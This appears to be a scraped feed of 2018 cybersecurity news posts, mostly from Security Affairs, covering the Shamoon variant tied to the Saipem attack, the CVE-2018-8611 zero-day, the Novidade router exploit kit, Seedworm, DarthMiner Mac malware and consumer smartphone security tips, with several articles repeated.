The file was uploaded on VirusTotal from Italy and malicious files were discovered at around the time Italian oil services company Saipem announced to have suffered a cyber attack.

“While Chronicle cannot directly link the new Shamoon variant to an active attack, the timing of the malware files comes close to news of an attack on an Italian energy corporation with assets in the Middle East.” 
Chronicle noted in a statement.

Pierluigi Paganini

(Security Affairs – Wiper, malware)

The post A new variant of Shamoon was uploaded to Virus Total while Saipem was under attack appeared first on Security Affairs.

Cyber attack hit the Italian oil and gas services company Saipem

Some of the servers of the Italian oil and gas services company Saipem were hit by a cyber attack early this week.

 Saipem has customers in more than 60 countries, including Saudi Arabian oil and gas giant Saudi Aramco. It could be considered a strategic target for a broad range of threat actors.

The attack has been identified out of India on Monday and primarily affected the servers in the Middle East, including Saudi Arabia, the United Arab Emirates, and Kuwait.

Main operating centers in Italy, France and Britain had not been affected.

The attack affected only a limited number of servers in its infrastructure, Saipem said it is working to restore them using backups, a circumstance that could suggest that a ransomware hit the company.

Saipem told Reuters the attack originated in Chennai, India, but the identity of the attackers is unknown.

“The servers involved have been shut down for the time being to assess the scale of the attack,”Saipem’s head of digital and innovation, Mauro Piasere, told Reuters. 

“There has been no loss of data because all our systems have back-ups,” he added.

Saipem

The Italian oil services company Saipem was hit by a cyber attack, it confirmed the event but has shared a few details about the attack.

“We have no proof of the origins or reasons for the attack, though this is being investigated,” a Saipem spokesperson said via email.

“We are collecting all the elements useful for assessing the impact on our infrastructures and the actions to be taken to restore normal activities,” the firm said in a statement.

At the time it is impossible to attribute the attack, it is not clear is the company faced a targeted attack or if was hit in a broader campaign carried out by threat actors.

We cannot exclude that attackers hit the company to target its business partners too, for example, Saudi Aramco that suffered Shamoon attacks in 2012 and 2016.

Saipem told media it was reporting the incident to the competent authorities.

Pierluigi Paganini

(Security Affairs – energy industry, cyber attack)

The post Cyber attack hit the Italian oil and gas services company Saipem appeared first on Security Affairs.

Nasty Android malware found stealing its victims’ PayPal funds

By Waqas

Another day, another Android malware – This time, according to the latest findings of ESET’s IT security researchers, there is a new malware in Google Play Store that hijacks PayPal account to steal money – Researchers assessed that the malware is specifically targeting Android users and steals no less than $1,000. The malware was first […]

This is a post from HackRead.com Read the original post: Nasty Android malware found stealing its victims’ PayPal funds

New threat actor SandCat exploited recently patched CVE-2018-8611 0day

Experts from Kaspersky Lab reported that that the recently patched Windows kernel zero-day vulnerability (CVE-2018-8611) has been exploited by several threat actors.

Microsoft’s Patch Tuesday updates for December 2018 address nearly 40 flaws, including a zero-day vulnerability affecting the Windows kernel.

The flaw, tracked as CVE-2018-8611, is as a privilege escalation flaw caused by the failure of the Windows kernel to properly handle objects in memory.

“An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.” reads the security advisory published by Microsoft.

“An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.”

The vulnerability was reported to Microsoft by researchers at Kaspersky Lab. Kudos to Kaspersky experts that in the last months reported other two Windows zero-days, CVE-2018-8453 and CVE-2018-8589, respectively exploited by FruityArmor and multiple threat actors in attacks mostly aimed at the Middle East.

according to Kaspersky, the CVE-2018-8611 is a race condition that resides in the Kernel Transaction Manager, and most interesting, it could be used to escape the sandbox of the Chrome and Edge web browsers.

“CVE-2018-8611 is a race condition that is present in the Kernel Transaction Manager due to improper processing of transacted file operations in kernel mode.” reads the analysis published by Kaspersky.

“This vulnerability successfully bypasses modern process mitigation policies, such as Win32k System call Filtering that is used, among others, in the Microsoft Edge Sandbox and the Win32k Lockdown Policy employed in the Google Chrome Sandbox. Combined with a compromised renderer process, for example, this vulnerability can lead to a full Remote Command Execution exploit chain in the latest state-of-the-art web-browsers.”

Kaspersky has found several builds of the CVE-2018-8611 exploit, including one adapted for the latest versions of Windows.

The flaw was exploited by known threat actors and a recently discovered group tracked as SandCat that appears to be active in the Middle East.

SandCat was also using the FinFisher/FinSpy spyware and the CHAINSHOT malware,

According to Kaspersky, SandCat exploited the CVE-2018-8611 flaw in attacks aimed at entities in the Middle East and Africa. 

Pierluigi Paganini

(Security Affairs –SANDCAT, CVE-2018-8611)

The post New threat actor SandCat exploited recently patched CVE-2018-8611 0day appeared first on Security Affairs.

Novidade, a new Exploit Kit is targeting SOHO Routers

Security experts at Trend Micro have discovered a new exploit kit, dubbed Novidade (“novelty” in Portuguese), that is targeting SOHO routers to compromise the devices connected to the network equipment.

The Novidade exploit kit leverages cross-site request forgery (CSRF) to change the Domain Name System (DNS) settings of SOHO routers and redirect traffic from the connected devices to the IP address under the control of the attackers.

Since its first discovery in August 2017, experts observed three variants of the exploit kit, including one involved in the DNSChanger system of a recent GhostDNS campaign.

Currently, Novidade is used in different campaigns, experts believe it has been sold to multiple threat actors or its source code leaked.

Most of the campaigns discovered by the researchers leverages phishing attacks to retrieve banking credentials in Brazil. Experts also observed campaigns with no specific target geolocation, a circumstance that suggests attackers are expanding their target areas or a larger number of threat actors are using the exploit kit. 

“We found Novidade being delivered through a variety of methods that include malvertising, compromised website injection, and via instant messengers.” reads the analysis published by Trend Micro.

Novidade eK

Experts noticed that the landing page performs HTTP requests generated by JavaScript Image function to a predefined list of local IP addresses that are used by routers. Once established a connection, the Novidade toolkit queries the IP address to download an exploit payload encoded in base64.

The exploit kit blindly attacks the detected IP address with all its exploits. 

The malicious code also attempts to log into the router with a set of default credentials and then executes a CSRF attack to change the DNS settings.

“Once the router is compromised, all devices connected to it are vulnerable to additional pharming attacks.” continues the analysis.

All the variants of Novidade exploit kit observed by Trend Micro share the same attack chain, but the latest version improves the code on the landing page and adds a new method of retrieving the victim’s local IP address. 

Below the list of possible affected router models based on Trend Micro comparisons of the malicious code, network traffic, and published PoC code. 

  • A-Link WL54AP3 / WL54AP2 (CVE-2008-6823)
  • D-Link DSL-2740R
  • D-Link DIR 905L
  • Medialink MWN-WAPR300 (CVE-2015-5996)
  • Motorola SBG6580
  • Realtron
  • Roteador GWR-120
  • Secutech RiS-11/RiS-22/RiS-33 (CVE-2018-10080)
  • TP-Link TL-WR340G / TL-WR340GD
  • TP-Link WR1043ND V1 (CVE-2013-2645)

Novidade was used mostly to target Brazilian users, the largest campaign has delivered the exploit kit 24 million times since March. 

In September and October, the Novidade was delivered through notifications on instant messengers regarding the 2018 Brazil presidential election, and leveraging compromised websites injected with an iframe to redirect users to Novidade. The latter attack hit websites worldwide.

Trend Micro recommends to keep devices’ firmware up to date, change the default usernames and passwords on their routers, and also change the router’s default IP address. If not needed, disabling remote access is also recommended, as well as using secure web connections (HTTPS) to access sensitive websites to prevent pharming attacks.

Pierluigi Paganini

(Security Affairs – Novidade exploit kit, hacking)

The post Novidade, a new Exploit Kit is targeting SOHO Routers appeared first on Security Affairs.

Security Affairs: Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries

Group-IB, an international company that specializes in preventing cyberattacks, has detected more than 40 000 compromised user credentials of online government services in 30 countries around the world.

Most of the victims were in Italy (52%), Saudi Arabia (22%) and Portugal (5%). Users’ data might have been sold on underground hacker forums or used in targeted attacks to steal money or exfiltrate sensitive information. CERT-GIB (Group-IB’s Computer Emergency Response Team) upon identification of this information promptly warned CERTs of the affected countries about the threat so that risks could be mitigated.

Group-IB Threat Intelligence has detected government websites’ user accounts compromised by cyber criminals in 30 countries. Official government portals including Poland (gov.pl), Romania (gov.ro),Switzerland (admin.ch), the websites of Italian Ministry of Defense (difesa.it), Israel Defense Forces(idf.il), the Government of Bulgaria (government.bg), the Ministry of Finance of Georgia (mof.ge),Norwegian Directorate of Immigration (udi.no), the Ministries of Foreign Affairs of Romania and Italyand many other government agencies were affected by the data compromise.

Government employees, military and civilian citizens who had accounts on official government portals of France (gouv.fr), Hungary (gov.hu) and Croatia (gov.hr) became victims of this data compromise. In total Group-IB Threat Intelligence system has detected more than 40 000 comprised user accounts of the largest government websites in 30 countries across the world over the past year and a half – Italy (52%), Saudi Arabia (22%) and Portugal (5%) were affected most.

According to Group-IB experts, cyber criminals stole user accounts’ data using special spyware – form grabbers, keyloggers, such as Pony Formgrabber, AZORult and Qbot (Qakbot). Phishing emails were sent to personal and corporate email accounts. The infection came from a malware included as an email attachment disguised as a legitimate file or archive. Once opened, it ran a Trojan aimed at stealing personal information. For instance, Pony Formgrabber retrieves login credentials from configuration files, databases, secret storages of more than 70 programs on the victim’s computer and then sends stolen information to cyber criminals’ C&C server. Another Trojan-stealer — AZORult, aside from stealing passwords from popular browsers, is capable of stealing crypto wallets data. Qbot worm gathers login credentials through use of keylogger, steals cookie files and certificates, active internet sessions, and forwards users to fake websites.

The stolen user accounts data is usually sorted by subject (banks’ client data, government portals user accounts, combo lists – email & password) and goes for sale on underground hacker forums. It is worth noting that government websites’ user accounts are less common on the forums. Cyber criminals and state-sponsored APT-groups, specialized in sabotage and espionage, are among those who can buy this information. Knowing the credentials of government websites’ users, hackers can not only obtain classified information from these websites, but also infiltrate government networks. Even one compromised government employee’s account can lead to the theft of commercial or state secrets.

“The scale and simplicity of government employees’ data compromise shows that users, due to their carelessness and lack of reliable cyber defense, fall victims to hackers, – commented Alexandr Kalinin,head of Group-IB’s Computer Emergency Response Team (CERT-GIB). – Malware used by cyber criminals to compromise user accounts continue to evolve. For better protection against this type of attacks, it is indeed important to not only use most up-to-date anti-APT solutions, but also to know the context of the attacks:  when, where and how exactly your data was compromised”.

Regularly updated Group-IB Threat Intelligence system allows to get actionable information about data leaks, compromised accounts, information about malware, infected IPs, existing vulnerabilities across the world. These unique indicators allow to prepare for cyberattacks in advance. Another important factor is international cooperation. To prevent further incidents GIB-CERT experts contacted official CERTs in more than 30 countries and notified local incident response teams about data compromise.

“Threat Intelligence data exchange between official government CERTs is crucial for global fight against cybercrime, — highlights Alexandr Kalinin, — it is important for us to cooperate with other CERTs, which allows to provide rapid incident response and gather more information about hackers’ evolving tactics and tools, indicators of compromise, and about most urgent threats. Cybercrime has no borders and affects private and public companies and ordinary citizens. International data exchange on current threats is a backbone of global stability”. 

About the author: Group-IB

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection. 

Pierluigi Paganini

(Security Affairs – leaked credentials, cybercrime)

The post Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries appeared first on Security Affairs.



Security Affairs

Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries

Group-IB, an international company that specializes in preventing cyberattacks, has detected more than 40 000 compromised user credentials of online government services in 30 countries around the world.

Most of the victims were in Italy (52%), Saudi Arabia (22%) and Portugal (5%). Users’ data might have been sold on underground hacker forums or used in targeted attacks to steal money or exfiltrate sensitive information. CERT-GIB (Group-IB’s Computer Emergency Response Team) upon identification of this information promptly warned CERTs of the affected countries about the threat so that risks could be mitigated.

Group-IB Threat Intelligence has detected government websites’ user accounts compromised by cyber criminals in 30 countries. Official government portals including Poland (gov.pl), Romania (gov.ro),Switzerland (admin.ch), the websites of Italian Ministry of Defense (difesa.it), Israel Defense Forces(idf.il), the Government of Bulgaria (government.bg), the Ministry of Finance of Georgia (mof.ge),Norwegian Directorate of Immigration (udi.no), the Ministries of Foreign Affairs of Romania and Italyand many other government agencies were affected by the data compromise.

Government employees, military and civilian citizens who had accounts on official government portals of France (gouv.fr), Hungary (gov.hu) and Croatia (gov.hr) became victims of this data compromise. In total Group-IB Threat Intelligence system has detected more than 40 000 comprised user accounts of the largest government websites in 30 countries across the world over the past year and a half – Italy (52%), Saudi Arabia (22%) and Portugal (5%) were affected most.

According to Group-IB experts, cyber criminals stole user accounts’ data using special spyware – form grabbers, keyloggers, such as Pony Formgrabber, AZORult and Qbot (Qakbot). Phishing emails were sent to personal and corporate email accounts. The infection came from a malware included as an email attachment disguised as a legitimate file or archive. Once opened, it ran a Trojan aimed at stealing personal information. For instance, Pony Formgrabber retrieves login credentials from configuration files, databases, secret storages of more than 70 programs on the victim’s computer and then sends stolen information to cyber criminals’ C&C server. Another Trojan-stealer — AZORult, aside from stealing passwords from popular browsers, is capable of stealing crypto wallets data. Qbot worm gathers login credentials through use of keylogger, steals cookie files and certificates, active internet sessions, and forwards users to fake websites.

The stolen user accounts data is usually sorted by subject (banks’ client data, government portals user accounts, combo lists – email & password) and goes for sale on underground hacker forums. It is worth noting that government websites’ user accounts are less common on the forums. Cyber criminals and state-sponsored APT-groups, specialized in sabotage and espionage, are among those who can buy this information. Knowing the credentials of government websites’ users, hackers can not only obtain classified information from these websites, but also infiltrate government networks. Even one compromised government employee’s account can lead to the theft of commercial or state secrets.

“The scale and simplicity of government employees’ data compromise shows that users, due to their carelessness and lack of reliable cyber defense, fall victims to hackers, – commented Alexandr Kalinin,head of Group-IB’s Computer Emergency Response Team (CERT-GIB). – Malware used by cyber criminals to compromise user accounts continue to evolve. For better protection against this type of attacks, it is indeed important to not only use most up-to-date anti-APT solutions, but also to know the context of the attacks:  when, where and how exactly your data was compromised”.

Regularly updated Group-IB Threat Intelligence system allows to get actionable information about data leaks, compromised accounts, information about malware, infected IPs, existing vulnerabilities across the world. These unique indicators allow to prepare for cyberattacks in advance. Another important factor is international cooperation. To prevent further incidents GIB-CERT experts contacted official CERTs in more than 30 countries and notified local incident response teams about data compromise.

“Threat Intelligence data exchange between official government CERTs is crucial for global fight against cybercrime, — highlights Alexandr Kalinin, — it is important for us to cooperate with other CERTs, which allows to provide rapid incident response and gather more information about hackers’ evolving tactics and tools, indicators of compromise, and about most urgent threats. Cybercrime has no borders and affects private and public companies and ordinary citizens. International data exchange on current threats is a backbone of global stability”. 

About the author: Group-IB

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection. 

Pierluigi Paganini

(Security Affairs – leaked credentials, cybercrime)

The post Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries appeared first on Security Affairs.

Hackers Defaced Linux.org As Protest Against Linux Code of Conduct

Just recently, Linux.org owners had to bear with a seriously embarrassing situation when they noticed someone meddling with their website.

Hackers Defaced Linux.org As Protest Against Linux Code of Conduct on Latest Hacking News.

Security Affairs: Seedworm APT Group targeted more than 130 victims in 30 organizations since Sept

The Seedworm APT Group has targeted more than 130 victims in 30 organizations since September including NGOs, oil and gas, and telecom businesses.

According to a new research conducted from Symantec’s DeepSight Managed Adversary and ThreatIntelligence (MATI) team, the Seedworm APT group, aka MuddyWater, is rapidly evolving and extended its targets to the telecom, IT services, and oil and gas industries.

The first MuddyWater campaign was observed in late 2017, then researchers from Palo Alto Networks were investigating a mysterious wave of attacks in the Middle East.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing these attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

In September 2018, experts from Symantec found evidence of Seedworm and the espionage group APT28 on a computer in the Brazil-based embassy of an oil-producing nation. 

“We not only found the initial entry point, but we were able to follow Seedworm’s subsequent activity after the initial infection due to the vast telemetry Symantec has access to via its Global Intelligence Network. Because of this unique visibility, our analysts were able to trace what actions Seedworm took after they got into a network.”

“Seeing two active groups piqued our interest and, as we began pulling on that one string, we found more clues that led us to uncover new information about Seedworm.” reads the analysis published by Symantec.

The experts were able to gather further information on the group, of the 131 victims hit from mid-September to late November 2018, 39% were in Pakistan,14% in Turkey, 8% in Russia, and 5% in Saudi Arabia.

Most of the targets were in the telecommunications and IT services sectors.

Seedworm

Experts believe that the Seedworm APT is focused on telecommunications and IT services because they are interested in gaining access to customers of those firms. Changing Tools and Techniques

Seedworm threat actors regularly adopt new tactics, techniques and tools to remain under the radar. 

In recent campaigns, the cyber espionage group used new variants of their Powermud backdoor, a new backdoor (Powermuddy), and some custom tools designed to steal passwords, create reverse shells, escalate privilege, and use of the native Windows cabinet creation tool.

“We found new variants of the Powermud backdoor, a new backdoor (Backdoor.Powemuddy), and custom tools for stealing passwords, creating reverse shells, privilege escalation, and the use of the native Windows cabinet creation tool, makecab.exe, probably for compressing stolen data to be uploaded.” continues the analysis.

“The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control (C&C) location.”

Once compromised a machine with its backdoors, threat actors deploy a tool to steal passwords saved in browsers, email accounts, social media, and chat access.

Attackers are very agile, they also used publicly available tools to quickly update operations.

Unlike other APT groups that adopt custom malware for each campaign, Seedworm threat actors were more focused on the ability to quickly adapt their action to the specific circumstance. 

According to Symantec, there is evidence of Seedworm following the people who are analyzing their activities.

Further details, including IoCs are reported in the report published by Symantec.

Pierluigi Paganini

(Security Affairs –Seedworm , APT)

The post Seedworm APT Group targeted more than 130 victims in 30 organizations since Sept appeared first on Security Affairs.



Security Affairs

Seedworm APT Group targeted more than 130 victims in 30 organizations since Sept

The Seedworm APT Group has targeted more than 130 victims in 30 organizations since September including NGOs, oil and gas, and telecom businesses.

According to a new research conducted from Symantec’s DeepSight Managed Adversary and ThreatIntelligence (MATI) team, the Seedworm APT group, aka MuddyWater, is rapidly evolving and extended its targets to the telecom, IT services, and oil and gas industries.

The first MuddyWater campaign was observed in late 2017, then researchers from Palo Alto Networks were investigating a mysterious wave of attacks in the Middle East.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing these attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

In September 2018, experts from Symantec found evidence of Seedworm and the espionage group APT28 on a computer in the Brazil-based embassy of an oil-producing nation. 

“We not only found the initial entry point, but we were able to follow Seedworm’s subsequent activity after the initial infection due to the vast telemetry Symantec has access to via its Global Intelligence Network. Because of this unique visibility, our analysts were able to trace what actions Seedworm took after they got into a network.”

“Seeing two active groups piqued our interest and, as we began pulling on that one string, we found more clues that led us to uncover new information about Seedworm.” reads the analysis published by Symantec.

The experts were able to gather further information on the group, of the 131 victims hit from mid-September to late November 2018, 39% were in Pakistan,14% in Turkey, 8% in Russia, and 5% in Saudi Arabia.

Most of the targets were in the telecommunications and IT services sectors.

Seedworm

Experts believe that the Seedworm APT is focused on telecommunications and IT services because they are interested in gaining access to customers of those firms. Changing Tools and Techniques

Seedworm threat actors regularly adopt new tactics, techniques and tools to remain under the radar. 

In recent campaigns, the cyber espionage group used new variants of their Powermud backdoor, a new backdoor (Powermuddy), and some custom tools designed to steal passwords, create reverse shells, escalate privilege, and use of the native Windows cabinet creation tool.

“We found new variants of the Powermud backdoor, a new backdoor (Backdoor.Powemuddy), and custom tools for stealing passwords, creating reverse shells, privilege escalation, and the use of the native Windows cabinet creation tool, makecab.exe, probably for compressing stolen data to be uploaded.” continues the analysis.

“The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control (C&C) location.”

Once compromised a machine with its backdoors, threat actors deploy a tool to steal passwords saved in browsers, email accounts, social media, and chat access.

Attackers are very agile, they also used publicly available tools to quickly update operations.

Unlike other APT groups that adopt custom malware for each campaign, Seedworm threat actors were more focused on the ability to quickly adapt their action to the specific circumstance. 

According to Symantec, there is evidence of Seedworm following the people who are analyzing their activities.

Further details, including IoCs are reported in the report published by Symantec.

Pierluigi Paganini

(Security Affairs –Seedworm , APT)

The post Seedworm APT Group targeted more than 130 victims in 30 organizations since Sept appeared first on Security Affairs.

Google will shut down consumer version of Google+ earlier due to a bug

Google announced it will close the consumer version of Google+ before than originally planned due to the discovery of a new security flaw.

Google will close the consumer version of Google+ in April, four months earlier than planned. According to G Suite product management vice president David Thacker. the company will maintain only a version designed for businesses. Google will shut down the Application programming interface programs (APIs) used by developers to access Google+ data within 90 days, due to the discovery of a bug.

“We’ve recently determined that some users were impacted by a software update introduced in November that contained a bug affecting a Google+ API.” wrote David Thacker.

“We discovered this bug as part of our standard and ongoing testing procedures and fixed it within a week of it being introduced. No third party compromised our systems, and we have no evidence that the app developers that inadvertently had this access for six days were aware of it or misused it in any way.”

The new flaw was introduced with a software update in November and it was discovered during routine testing and quickly fixed by the experts of the company.

Thacker pointed out that the protection of Google users is a priority for the firm and for this reason all Google+ APIs will be shut-down soon.

“With the discovery of this new bug, we have decided to expedite the shut-down of all Google+ APIs,” Thacker said.

“While we recognize there are implications for developers, we want to ensure the protection of our users.”

social network Google+

According to Google, the vulnerability affected approximately 52.5 million users, allowing applications to see profile information such as name, occupation, age, and email address even if access was set to private.

Google initially announced plans to shut down Google+ after discovered 
a bug that exposed private data in as many as 500,000 accounts

At the time, there was no evidence that developers had taken advantage of the flaw.

Google is in the process of notifying any enterprise customers that were impacted by this flaw.

“A list of impacted users in those domains is being sent to system administrators, and we will reach out again if any additional impacted users or issues are discovered.” concludes Thacker. 

Pierluigi Paganini

(Security Affairs –Google+, social network)

The post Google will shut down consumer version of Google+ earlier due to a bug appeared first on Security Affairs.

A new Mac malware combines a backdoor and a crypto-miner

Experts from Malwarebytes discovered a new strain of Mac malware, tracked as DarthMiner, that is a combination of two open-source programs. 

Experts from Malwarebytes discovered a new piece of Mac malware, tracked as DarthMiner, that is the combination of two open source tools.

The malware is distributed through Adobe Zii, an application supposedly helps in the piracy of various Adobe programs. In this case, attackers used a fake Adobe Zii software that was definitely not the real thing.

“Earlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools—the EmPyre backdoor and the XMRig cryptominer—for the purpose of evil.” reads the analysis published by MalwareBytes.

“The malware was being distributed through an application named Adobe Zii.”

The fake Adobe Zii application was developed to run a shell script that downloads and executes a Python script, and then downloads and runs an app named sample.app, that appears to be a version of Adobe Zii, most likely to appear as a harmless application. 

The Python script looks for the presence of Little Snitch, a commonly-used outgoing firewall, and halt the infection process if it is present.

Then the script opens a connection to an EmPyre backend that send arbitrary commands to a compromised Mac. Next, the backdoor downloads a script that fetches and installs the other components of the malware. The malware creates a launch agent named com.proxy.initialize.plist that keeps the backdoor open persistently by running exactly the same obfuscated Python script mentioned previously.

The malicious code also installs the XMRig cryptominer and creates a launch agent for it. 

The analysis of the code revealed another interesting feature, the code to download and install a root certificate for the mitmproxy tool.

“Interestingly, there’s code in that script to download and install a root certificate associated with the mitmproxy software, which is software capable of intercepting all web traffic, including (with the aid of the certificate) encrypted “https” traffic. However, that code was commented out, indicating it was not active.” continues the analysis.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis,

“Please, in the future, do yourself a favor and don’t pirate software. The costs can be far higher than purchasing the software you’re trying to get for free,” Malwarebytes concludes.

Pierluigi Paganini

(Security Affairs – Mac malware, backdoor)

The post A new Mac malware combines a backdoor and a crypto-miner appeared first on Security Affairs.

Security Affairs: A new Mac malware combines a backdoor and a crypto-miner

Experts from Malwarebytes discovered a new strain of Mac malware, tracked as DarthMiner, that is a combination of two open-source programs. 

Experts from Malwarebytes discovered a new piece of Mac malware, tracked as DarthMiner, that is the combination of two open source tools.

The malware is distributed through Adobe Zii, an application supposedly helps in the piracy of various Adobe programs. In this case, attackers used a fake Adobe Zii software that was definitely not the real thing.

“Earlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools—the EmPyre backdoor and the XMRig cryptominer—for the purpose of evil.” reads the analysis published by MalwareBytes.

“The malware was being distributed through an application named Adobe Zii.”

The fake Adobe Zii application was developed to run a shell script that downloads and executes a Python script, and then downloads and runs an app named sample.app, that appears to be a version of Adobe Zii, most likely to appear as a harmless application. 

The Python script looks for the presence of Little Snitch, a commonly-used outgoing firewall, and halt the infection process if it is present.

Then the script opens a connection to an EmPyre backend that send arbitrary commands to a compromised Mac. Next, the backdoor downloads a script that fetches and installs the other components of the malware. The malware creates a launch agent named com.proxy.initialize.plist that keeps the backdoor open persistently by running exactly the same obfuscated Python script mentioned previously.

The malicious code also installs the XMRig cryptominer and creates a launch agent for it. 

The analysis of the code revealed another interesting feature, the code to download and install a root certificate for the mitmproxy tool.

“Interestingly, there’s code in that script to download and install a root certificate associated with the mitmproxy software, which is software capable of intercepting all web traffic, including (with the aid of the certificate) encrypted “https” traffic. However, that code was commented out, indicating it was not active.” continues the analysis.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis,

“Please, in the future, do yourself a favor and don’t pirate software. The costs can be far higher than purchasing the software you’re trying to get for free,” Malwarebytes concludes.

Pierluigi Paganini

(Security Affairs – Mac malware, backdoor)

The post A new Mac malware combines a backdoor and a crypto-miner appeared first on Security Affairs.



Security Affairs

Toyota’s PASTA- A car hacking tool to enhance automobile cybersecurity

By Waqas

A team of security researchers working for the renowned automobile maker Toyota have developed a new car hacking tool. Dubbed as PASTA (Portable Automotive Security Testbed), it is an open source tool created to help researchers identify the prevailing vulnerabilities in modern vehicles. The team presented their research at the BLACKHAT EUROPE 2018, London, where […]

This is a post from HackRead.com Read the original post: Toyota’s PASTA- A car hacking tool to enhance automobile cybersecurity

How To Tell If Your Smartphone Has Been Hacked

Your home screen is just a matrix of numbers. Your device loses its charge quickly, or restarts suddenly. Or, you notice outgoing calls that you never dialed. Chances are your smartphone has been hacked. The sad truth is that hackers now have a multitude of ways to get into your phone, without ever touching it.

Given that our smartphones have become our new wallets, containing a treasure trove of personal and financial information, a breach can leave you at serious risk.

The intruder could log in to your accounts as you, spam your contacts with phishing attacks, or rack up expensive long-distance charges. They could also access any passwords saved on your phone, potentially opening the door to sensitive financial accounts. That’s why it’s important to be able to recognize when your smartphone has been hacked, especially since some of the signs can be subtle.

Here are some helpful clues:

Performance Differences

Is your device operating slower, are web pages and apps harder to load, or does your battery never seem to keep a charge? What about your data plan? Are you exceeding your normal limits? These are all signs that you have malware running in the background, zapping your phone’s resources.

You may have downloaded a bad app, or clicked on a dangerous link in a text message. And malware, like Bitcoin miners, can strain computing power, sometimes causing the phone to heat up, even when you aren’t using it.

Mystery Apps or Data

If you find apps you haven’t downloaded, or calls, texts, and emails that you didn’t send, a hacker is probably in your system. They may be using your device to send premium rate calls or messages, or to spread malware to your contacts.

Pop-ups or Strange Screen Savers

Malware can also be behind spammy pop-ups, changes to your home screen, or bookmarks to suspicious websites. In fact, if you see any configuration changes you didn’t personally make, this is another big clue that your smartphone has been hacked.

What To Do

If any of these scenarios sound familiar, it’s time to take action. Start by deleting any apps or games you didn’t download, erasing risky messages, and running mobile security software, if you have it. Warn your contacts that your phone has been compromised, and to ignore any suspicious links or messages coming from you.

If the problem still doesn’t go away, consider restoring your phone to its original settings. Search online for instructions for your particular phone and operating system to learn how.

Now, let’s look at how to avoid getting hacked in the first place.

Secure Smartphone Tips

1. Use mobile security software—These days your smartphone is just as data rich as your computer. Make sure to protect your critical information, and your privacy, by using comprehensive mobile security software that not only protects you from online threats, but offers anti-theft and privacy protection.

2. Lock your device & don’t store passwords—Make sure that you are using a passcode or facial ID to lock your device when you’re not using it. This way, if you lose your phone it will be more difficult for a stranger to access your information.

Also, remember not to save password or login information for banking apps and other sensitive accounts. You don’t want a hacker to be able to automatically login as you if they do gain access to your device.

3. Avoid using public Wi-Fi—Free Wi-Fi networks, like those offered in hotels and airports, are often unsecured. This makes it easy for a hacker to potentially see the information you are sending over the network. Also, be wary of using public charging stations, unless you choose a “charging only” cable that cannot access your data.

 4. Never leave your device unattended in public—While many threats exist online, you still have to be aware of real-world threats, like someone grabbing your device when you’re not looking. Keep your smartphone on you, or within view, while in public.

If you have a “phone visibility” option, turn it off. This setting allows nearby devices to see your phone and exchange data with it.

5. Stay aware—New mobile threats are emerging all the time. Keep up on the latest scams and warning signs, so you know what to look out for.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Tell If Your Smartphone Has Been Hacked appeared first on McAfee Blogs.

McAfee Blogs: How To Tell If Your Smartphone Has Been Hacked

Your home screen is just a matrix of numbers. Your device loses its charge quickly, or restarts suddenly. Or, you notice outgoing calls that you never dialed. Chances are your smartphone has been hacked. The sad truth is that hackers now have a multitude of ways to get into your phone, without ever touching it.

Given that our smartphones have become our new wallets, containing a treasure trove of personal and financial information, a breach can leave you at serious risk.

The intruder could log in to your accounts as you, spam your contacts with phishing attacks, or rack up expensive long-distance charges. They could also access any passwords saved on your phone, potentially opening the door to sensitive financial accounts. That’s why it’s important to be able to recognize when your smartphone has been hacked, especially since some of the signs can be subtle.

Here are some helpful clues:

Performance Differences

Is your device operating slower, are web pages and apps harder to load, or does your battery never seem to keep a charge? What about your data plan? Are you exceeding your normal limits? These are all signs that you have malware running in the background, zapping your phone’s resources.

You may have downloaded a bad app, or clicked on a dangerous link in a text message. And malware, like Bitcoin miners, can strain computing power, sometimes causing the phone to heat up, even when you aren’t using it.

Mystery Apps or Data

If you find apps you haven’t downloaded, or calls, texts, and emails that you didn’t send, a hacker is probably in your system. They may be using your device to send premium rate calls or messages, or to spread malware to your contacts.

Pop-ups or Strange Screen Savers

Malware can also be behind spammy pop-ups, changes to your home screen, or bookmarks to suspicious websites. In fact, if you see any configuration changes you didn’t personally make, this is another big clue that your smartphone has been hacked.

What To Do

If any of these scenarios sound familiar, it’s time to take action. Start by deleting any apps or games you didn’t download, erasing risky messages, and running mobile security software, if you have it. Warn your contacts that your phone has been compromised, and to ignore any suspicious links or messages coming from you.

If the problem still doesn’t go away, consider restoring your phone to its original settings. Search online for instructions for your particular phone and operating system to learn how.

Now, let’s look at how to avoid getting hacked in the first place.

Secure Smartphone Tips

1. Use mobile security software—These days your smartphone is just as data rich as your computer. Make sure to protect your critical information, and your privacy, by using comprehensive mobile security software that not only protects you from online threats, but offers anti-theft and privacy protection.

2. Lock your device & don’t store passwords—Make sure that you are using a passcode or facial ID to lock your device when you’re not using it. This way, if you lose your phone it will be more difficult for a stranger to access your information.

Also, remember not to save password or login information for banking apps and other sensitive accounts. You don’t want a hacker to be able to automatically login as you if they do gain access to your device.

3. Avoid using public Wi-Fi—Free Wi-Fi networks, like those offered in hotels and airports, are often unsecured. This makes it easy for a hacker to potentially see the information you are sending over the network. Also, be wary of using public charging stations, unless you choose a “charging only” cable that cannot access your data.

